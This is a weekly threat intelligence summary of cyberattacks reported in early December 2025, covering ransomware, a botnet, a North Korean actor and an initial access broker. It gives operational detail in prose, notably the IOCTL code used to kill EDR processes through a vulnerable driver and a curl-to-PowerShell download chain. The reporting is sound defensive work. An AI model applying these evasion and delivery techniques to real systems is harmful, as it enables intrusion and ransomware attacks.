< Back
a smart card circuit

Tags:

Threat intelligence
11 December 2025

Weekly Summary Cyberattacks December 04-10

New BYOVD Loader Behind DeadLock Ransomware Attack 

A new set of tactics, techniques, and procedures used by a financially motivated threat actor deploying the DeadLock ransomware was unlocked, including a previously unknown Bring Your Own Vulnerable Driver (BYOVD) loader that exploits the Baidu Antivirus driver vulnerability CVE-2024-51324. The attacker dropped a custom loader ("EDRGay.exe") and a renamed vulnerable driver ("DriverGay.sys") onto victim systems, using the loader to initialize and communicate with the legitimate but exploitable BdApiUtil.sys driver. By issuing a crafted DeviceIOControl call with IOCTL code 0x800024b4, the actor leveraged the driver's improper privilege management flaw to terminate antivirus and EDR processes via kernel-level execution of ZwTerminateProcess(), enabling full defense evasion before ransomware deployment. 

LockBit Ransomware Group Returns with New Data Leak Site, 21 Victims   

According to information dated December 5, 2025, the LockBit ransomware group is attempting a renewed comeback, launching a new Dark Web data leak site and claiming 21 victims, according to reporting updated on December 8. Once considered the most dominant ransomware operation globally (with more than 2,700 claimed victims over six years), LockBit's activity sharply declined following coordinated international law enforcement actions in early 2024, after which the group struggled to regain momentum. Its LockBit 4.0 version, released in early 2025, failed to achieve adoption among affiliates, while competing groups such as Qilin attracted operators with more favorable terms and improved feature sets. However, the introduction of LockBit 5.0, internally codenamed ChuongDong and announced on the RAMP forum in September, appears to be reinvigorating the group's activity. ´

Aisuru Botnet Behind New Record-Breaking 29.7 Tbps DDoS Attack   

According to information dated December 3, 2025, the Aisuru botnet has been identified as the source of a new record-breaking distributed denial-of-service (DDoS) attack that peaked at 29.7 terabits per second, marking the most powerful attack ever observed. Aisuru, a large-scale botnet-for-hire comprising one to four million compromised routers and IoT devices infected via known vulnerabilities and brute-forced credentials, launched more than 1,300 DDoS attacks in the past three months, nearly half of which exceeded 1 Tbps. 

Exclusive Look Inside a Compromised North Korean APT Machine Linked to The Biggest Heist in History   

A rare incident in which a North Korean state-sponsored threat actor's own development machine was compromised by the LummaC2 infostealer was detected, exposing internal operational details tied directly to the historic $1.4 billion ByBit cryptocurrency heist. Hudson Rock obtained the stolen data from a LummaC2 log and identified the victim not as an ordinary user but as a high-level DPRK malware developer operating a sophisticated malware engineering rig. 

Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation   

Security researchers report that the initial access broker (IAB) Storm-0249 has significantly evolved from a mass-phishing operation into a highly selective, post-exploitation threat actor capable of hijacking enterprise Endpoint Detection and Response (EDR) tools to enable ransomware affiliates. Storm-0249's recent campaigns begin with ClickFix-style social engineering, tricking users into executing encoded commands via the Windows Run dialog. This triggers a multi-stage intrusion chain in which curl.exe downloads payloads from attacker-controlled infrastructure disguised as Microsoft domains, and pipes the downloaded script directly into fileless PowerShell execution, bypassing disk-based detection.